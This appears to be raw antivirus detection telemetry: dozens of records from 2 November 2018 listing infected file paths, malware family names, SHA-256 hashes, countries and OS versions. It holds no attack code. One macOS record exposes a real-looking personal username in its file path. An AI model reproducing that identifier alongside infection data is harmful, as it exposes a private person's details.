  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k secsvcs', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:03:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T11:45:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:06:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='images.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\images\\images.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sounds.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL2\\SOUNDS\\SOUNDS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1274d6acfe66ff0d15e9f18aabc912135dda52fb2655b5746cac5c84a31bad0e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:16:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='919.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\919\\919.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144313-660dc6f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca086aae\\AVSCAN-20181102-144033-54B6A5F0\\AVSCAN-20181102-144313-660DC6F5', filesize=128000, name='PUA/IStartSurf.#M1.#R1'), hash='5532bdb64431c54029913d66bc525ebcf9e2ef5f9ad4b319fc0a76f51ba5a797', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:43:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182153-8944d40a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a82e24d\\AVSCAN-20181102-182005-75E689BF\\AVSCAN-20181102-182153-8944D40A', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:21:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='59ab2184f2377018262473ace1914b28815980e336dbfdf2bf94c4ea79380e82', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\59AB2184F2377018262473ACE1914B28815980E336DBFDF2BF94C4EA79380E82', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='59ab2184f2377018262473ace1914b28815980e336dbfdf2bf94c4ea79380e82', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:36:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163546-14bd4d39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7ee9a9a5\\AVSCAN-20181102-163456-0D63677C\\AVSCAN-20181102-163546-14BD4D39', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:35:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080018-3d903028', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080018-3D903028', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221844-59c5d141', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5732cab4\\AVSCAN-20181102-220138-CABA3555\\AVSCAN-20181102-221844-59C5D141', filesize=512000, name='Adware/Elex.njjta.#M1.#R1'), hash='1294817883d4f043f82d7762fb29805f6f55a8bab3b804fd15a2cb4a3e415a04', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:18:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.870\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.870\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T00:34:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='991851e71c62c5e345e376a662477bb3075cf309', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\991851e71c62c5e345e376a662477bb3075cf309', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:55:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cards.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\vp\\cards\\cards.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='1b481de0fcc213f8f8a881cc26e76c0310da9b046ed365460119fa90cfee23c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:20:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='45af74e0ae4dacfa58f8fa193ab0d91bde12562775fe6d678ebe46b5538ae494', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\45AF74E0AE4DACFA58F8FA193AB0D91BDE12562775FE6D678EBE46B5538AE494', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='45af74e0ae4dacfa58f8fa193ab0d91bde12562775fe6d678ebe46b5538ae494', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091546-b69618af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ec81ca1\\AVSCAN-20181102-091534-B51EF36D\\AVSCAN-20181102-091546-B69618AF', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T01:15:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T09:14:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='12650e148f589415f38932f407c0776477440b0eb2ea1dfe9e587d1c51ec0272', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\12650E148F589415F38932F407C0776477440B0EB2EA1DFE9E587D1C51EC0272', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='12650e148f589415f38932f407c0776477440b0eb2ea1dfe9e587d1c51ec0272', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:07:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='getdatafat.exe', filepath='E:\\HBCD\\Programs\\GETDATAFAT.exe', filesize=64000, name='TR/Siggen.64000.6.#M1.#R1'), hash='3f8ad9886492f19d0be4d277a4600ae8044d3bda4f0d836239df36f6e3c4bd3a', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134300-8a9ff1af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134300-8A9FF1AF', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Dragon Ball Raging Blast 2 Manager\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Dragon Ball Raging Blast 2 Manager\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T19:20:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bar.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\BAR\\BAR.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055204-652ed126', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055204-652ED126', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141430-54113dae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-141430-54113DAE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191310-d268341c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed8d8968\\AVSCAN-20181102-190822-B4418179\\AVSCAN-20181102-191310-D268341C', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T11:13:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050353-aa0da2b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050353-AA0DA2B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055223-70d665f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055223-70D665F8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062341-cfbcd9b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062341-CFBCD9B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051526-475e0209', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051526-475E0209', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061418-80889367', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061418-80889367', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145656-2d114315', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-145656-2D114315', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:03Z'), dt=datetime.date(2018, 11, 2)),
